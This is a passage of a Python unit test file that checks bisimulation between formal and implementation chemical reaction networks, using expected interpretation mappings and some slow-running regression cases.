i24 = {'a': ['A'], 'b': ['B'], 'c': [], 'd': ['C', 'D'], 'e': ['D'], 'f': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 24:
print()
for e, b in enumerate(bisims, 1):
print(e, b, b in [i01, i02, i03, i04, i05, i06, i07, i08, i09, i10,
i11, i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22, i23, i24])
assert len(bisims) == 24
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
assert i05 in bisims
assert i06 in bisims
assert i07 in bisims
assert i08 in bisims
assert i09 in bisims
assert i10 in bisims
assert i11 in bisims
assert i12 in bisims
assert i13 in bisims
assert i14 in bisims
assert i15 in bisims
assert i16 in bisims
assert i17 in bisims
assert i18 in bisims
assert i19 in bisims
assert i20 in bisims
assert i21 in bisims
assert i22 in bisims
assert i23 in bisims
assert i24 in bisims
def test_1f_3i(self):
fcrn = "A + B -> C + D"
icrn = "a + b <=> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
# No interpretation passes the permissive condition.
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
def test_2f_2i(self):
fcrn = "A + B -> C + D; C + D -> E + F"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['F'], 'f': ['E']}
i02 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['E'], 'f': ['F']}
i03 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['F'], 'f': ['E']}
i04 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['E'], 'f': ['F']}
i05 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['F'], 'f': ['E']}
i06 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['E'], 'f': ['F']}
i07 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['F'], 'f': ['E']}
i08 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['E'], 'f': ['F']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 8:
print()
for e, b in enumerate(bisims, 1):
print(e, {k:v for k, v in sorted(b.items())})
assert len(bisims) == 8
def test_order_formals_bug(self):
fcrn = "A + B -> C"
icrn = "B_1_ + i7 -> i684 + i17; A <=> i7; i17 -> C_1_ + i29"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': []}
i02 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
i03 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
i04 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
i05 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': ['C'], 'i17': [], 'i29': []}
i06 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': []}
i07 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
i08 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
i09 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
i10 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': ['C'], 'i17': [], 'i29': []}
# i8 and i9 are missing
#n11 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': []}
#n10 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': ['C'], 'i17': [], 'i29': []}
#n16 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
#n12 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
#n17 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
#n13 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': ['C'], 'i17': [], 'i29': []}
#n14 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': []}
#n15 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 10:
print()
for e, b in enumerate(bisims, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(bisims) == 10
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
assert i05 in bisims
assert i06 in bisims
assert i07 in bisims
assert i08 in bisims
assert i09 in bisims
assert i10 in bisims
def test_additional_formals(self):
fcrn = "A -> B"
icrn = "a -> b; c -> d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
fs = {'A', 'B', 'C'}
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['C']}
i02 = {'a': ['C'], 'b': ['C'], 'c': ['A'], 'd': ['B']}
bisims = list(crn_bisimulations(fcrn, icrn, formals = fs))
if len(bisims) != 2:
print('FAILURE:')
for e, b in enumerate(bisims, 1):
print(f'{e} {b}')
assert len(bisims) == 2
assert i01 in bisims
assert i02 in bisims
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class FastBisimulationTests(unittest.TestCase):
def test_example_01(self):
# A sample test to agree on a new interface for bisimulation.
fcrn = "A->B"
ecrn = "A<=>i19; i19<=>i39+X; i39->i71+i72"
fcrn, fs = parse_crn(fcrn)
ecrn, _ = parse_crn(ecrn)
partial = {sp: [sp] for sp in fs}
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertTrue(v)
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertTrue(v)
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertTrue(v)
# A function that does not document otherwise should not modify its arguments.
self.assertDictEqual(partial, {sp: [sp] for sp in fs})
def test_example_02(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
# First correct interpretation
inter1 = {'x1': ['A', 'B'],
'x2': ['C', 'D'],
'x3': ['C'],
'x4': ['A'],
'x5': ['A', 'C'],
'x6': ['C'],
'x7': ['B', 'D'],
'x8': ['D'],
'x9': ['B'],
'x10': ['B']}
pinter1 = {'x7': ['B', 'D']}
# Second correct interpretation
inter2 = {'x1': ['A', 'C'],
'x2': ['B', 'D'],
'x3': ['B'],
'x4': ['A'],
'x5': ['A', 'B'],
'x6': ['B'],
'x7': ['C', 'D'],
'x8': ['D'],
'x9': ['C'],
'x10': ['C']}
pinter2 = {'x7': ['C', 'D']}
# CRN preprocessing
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
# Using partial inter1
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
# Using inter1
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
# Using partial inter2
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
def test_example_02_false(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
v, _ = crn_bisimulation_test(fcrn, icrn, fs)
self.assertTrue(v)
# A partial interpretation that can still be extended to a bisimulation ...
partial = {'x2': ['B', 'D']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertTrue(v)
# Adding x3 -> C makes the partial interpretation unsatisfiable.
partial['x3'] = ['C']
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertFalse(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertFalse(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertFalse(v)
def test_example_04(self):
# Two valid interpretations
fcrn = "B + B -> B"
icrn = "B <=> x1; B + x1 -> x2 + x3; x2 -> B + x4"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
ifull1 = {'B': ['B'],
'x1': ['B'],
'x2': ['B', 'B'],
'x3': [],
'x4': []}
ipart1 = {'B': ['B'],
'x2': ['B', 'B']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = ipart1)
self.assertTrue(v)
self.assertDictEqual(i1, ifull1)
ifull2 = {'B': ['B'],
'x1': ['B'],
'x2': ['B'],
'x3': [],
'x4': []}
ipart2 = {'B': ['B'],
'x2': ['B']}
v, i2 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = ipart2)
self.assertTrue(v)
self.assertDictEqual(i2, ifull2)
def test_example_05(self):
# Regression: naming species in certain ways used to break bisimulation.
fcrn = "A + C -> A + B"
icrn = """A <=> x1 + e45
C + x1 <=> x3 + x4
x3 -> A + B + x5"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A': ['A'],
'B': ['B'],
'C': ['C'],
'x1': ['A'],
'x3': ['A', 'C']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter)
self.assertTrue(v)
def test_garbage_collection(self):
# Garbage collection schemes do not produce a correct CRN bisimulation ...
fcrn = "A + B <=> X + Y"
icrn = """
A <=> i22
i59 <=> i139
i45 -> i351 + i352
i22 + B <=> i45 + i44
i44 <=> i60 + i59
i60 -> i104 + i105
i139 <=> i227 + X
i227 <=> i269 + Y
i269 -> i338 + i339
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A': ['A'],
'B': ['B'],
'X': ['X'],
'Y': ['Y'],
'i22': ['A'],
'i44': ['A', 'B'],
'i59': ['A', 'B'],
'i139': ['A', 'B'],
'i227': ['Y']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation=inter)
assert not v
def test_QingDong_crn6_i02_gs_bf(self):
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_02 = {'i842': ['Y', 'X', 'A'],
'i394': ['X', 'Y', 'X'],
'i119': ['X', 'B', 'A'],
'i2300': ['A', 'C'],
'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_02,
permissive = 'graphsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_02,
permissive = 'bruteforce')
self.assertTrue(v)
def test_wrong_init(self):
fcrn = " -> A "
icrn = """A_1_ + i8 <=>
i8 ->"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A_1_' : ['A']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, inter)
assert v is False
def test_species_assignments(self):
# Uses soloveichik2010 translation scheme.
fcrn = "A + B -> B + B"
icrn = """A <=> i2
B_1_ + i5 <=> i43
B_1_ <=> i45
B_2_ + i5 <=> i49
B_2_ <=> i51
i2 <=> i3
i3 <=> i5
i5 + i5 <=> i7
i5 + i5 <=> i8
i5 + i25 <=> i28
i5 + i25 <=> i29
i5 <=> i10
i5 <=> i11
i7 <=> i8
i10 <=> i11
i25 <=> i31
i28 <=> i29
i31 -> B_1_ + i34
i34 -> B_2_
i34 <=> i38
i38 <=> i39
i39 -> B_2_
i39 -> i34
i43 -> i25
i49 -> i25 """
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
partial = {'A': ['A'], 'B_1_': ['B'], 'B_2_': ['B']}
v, i = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial)
assert v
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class ModularBisimulationTests(unittest.TestCase):
def test_qian_roessler_modular(self):
fcrns, fs = parse_crn('tests/crns/roessler_01.crn', is_file = True, modular = True)
icrns, _ = parse_crn('tests/crns/icrns/roessler_qian2011_modular.crn', is_file = True, modular = True)
partial = {sp: [sp] for sp in fs}
backup = {sp: [sp] for sp in fs}
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs, partial)
self.assertTrue(v)
self.assertDictEqual(partial, backup)
with self.assertRaises(NotImplementedError):
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs)
def test_qian_roessler_bisimulation_with_modular_interpretation(self):
fcrns, fs = parse_crn('tests/crns/roessler_01.crn', is_file = True, modular = True)
icrns, _ = parse_crn('tests/crns/icrns/roessler_qian2011_modular.crn', is_file = True, modular = True)
partial = {sp: [sp] for sp in fs}
backup = {sp: [sp] for sp in fs}
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs, partial)
self.assertTrue(v)
self.assertDictEqual(partial, backup)
fcrn, _ = parse_crn('tests/crns/roessler_01.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
v, i = crn_bisimulation_test(fcrn, icrn, fs, interpretation = i)
self.assertTrue(v)
def test_modularity_example_01(self):
module = """ a <=> i1
b + i1 -> i2 + w3
i2 -> c + w4
"""
module, _ = parse_crn(module)
fsc = {'A', 'B', 'C'}
isc = {'a', 'b', 'c'}
bisim = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'i1': ['A'], 'i2': ['C'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is True
bisim = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'i1': ['B'], 'i2': ['C'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is True
bisim = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'i1': ['A'], 'i2': ['A','B'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is False
def test_modularity_example_02(self):
module = """ b <=> e1
e1 -> e2 + e3 + e4
e4 -> e1 + e5
"""
module, _ = parse_crn(module)
fsc = {'B'}
isc = {'b'}
minter = {'b': ['B'], 'e1': ['B'], 'e2': [], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B'], 'e2': [], 'e3': [], 'e4': ['B'], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B', 'B'], 'e2': [], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is False
minter = {'b': ['B'], 'e1': ['B'], 'e2': ['B'], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is False
isc = {'b', 'e2'}
assert passes_modularity_condition(minter, module, isc, fsc) is True
isc = {'b', 'e5'}
minter = {'b': ['B'], 'e1': [], 'e2': [], 'e3': [], 'e4': [], 'e5': ['B']}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B'], 'e2': ['B'], 'e3': [], 'e4': [], 'e5': ['B']}
assert passes_modularity_condition(minter, module, isc, fsc) is False
def test_modularity_example_03(self):
module = """
a <=> e6
a <=> e1
a + e6 <=> e1
"""
module, _ = parse_crn(module)
fsc, isc = {'A'}, {'a'}
inter = {'a': ['A'], 'e1': ['A', 'A'], 'e6': ['A']}
assert passes_modularity_condition(inter, module, isc, fsc) is True
def test_modules(self):
fcrn1 = "A -> B"
fcrn2 = "C -> D"
icrn1 = "a + x -> b; <=> x"
icrn2 = "c + y -> d; <=> y"
icrn3a = "x + y <=> z"
icrn3b = "x + y <=> z; <=> x; <=> y"
icrn3c = "x + y <=> b"
fcrn1, fs1 = parse_crn(fcrn1)
fcrn2, fs2 = parse_crn(fcrn2)
icrn1, _ = parse_crn(icrn1)
icrn2, _ = parse_crn(icrn2)
icrn3a, _ = parse_crn(icrn3a)
icrn3b, _ = parse_crn(icrn3b)
icrn3c, _ = parse_crn(icrn3c)
inter = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'x': [], 'y': []}
inter2 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'x': [], 'y': [], 'z': []}
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2])
assert v
assert i == inter
with self.assertRaises(NotImplementedError):
# This one would actually pass, but is disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3a])
assert v
assert i == inter2
with self.assertRaises(NotImplementedError):
# This one would actually pass, but is disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3b])
assert v
assert i == inter2
with self.assertRaises(NotImplementedError):
# Unlike the cases above, this one would return False, but it is likewise disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3c])
assert v is False
@unittest.skipIf(SKIP_SLOW or SKIP_DEBUG, "skipping tests for debugging")
class SlowBisimulationTests(unittest.TestCase):
def test_QingDong_crn6_i1_gs(self):
# NOTE: under 3 minutes.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_01, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = inter_01, permissive = 'graphsearch'))
assert len(getall) == 3
#print()
#for e, b in enumerate(getall):
# print(e, {k: v for k, v in sorted(b.items())})
i1 = {'A': ['A'], 'B': ['B'], 'C': [], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A'], 'i2340': ['C'], 'i2392': [], 'i3032': ['C'], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
i2 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A', 'C'], 'i2340': [], 'i2392': [], 'i3032': [], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
i3 = {'A': ['A'], 'B': ['B'], 'C': [], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A', 'C'], 'i2340': [], 'i2392': ['C'], 'i3032': ['C'], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
def test_QingDong_crn6_i1_bf(self):
# NOTE: under 3 minutes.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_01, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = inter_01, permissive = 'bruteforce'))
assert len(getall) == 3
def test_QingDong_crn6_gs(self):
# NOTE: 17.5 hours
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert len(getall) == 5
def test_QingDong_crn6_bf(self):
# NOTE: 17.5 hours
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
assert len(getall) == 5
def test_qian_roessler_full_gs(self):
# TODO: 2 days 17 hours
(fcrn, fs) = parse_crn('tests/crns/roessler_01.crn', is_file = True)
(icrn, _) = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
partial = {sp: [sp] for sp in fs}
#v, i = crn_bisimulation_test(fcrn, icrn, fs, partial, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = partial, permissive = 'graphsearch'))
assert len(getall) == 12
def test_qian_roessler_full_bf(self):
# TODO: 2 days 17 hours
(fcrn, fs) = parse_crn('tests/crns/roessler_01.crn', is_file = True)
(icrn, _) = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
partial = {sp: [sp] for sp in fs}
#v, i = crn_bisimulation_test(fcrn, icrn, fs, partial, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = partial, permissive = 'bruteforce'))
assert len(getall) == 12
# And those are the solutions ...
i0 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i1 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i2 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i3 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i4 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i5 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i6 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i7 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i8 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i9 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i10 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
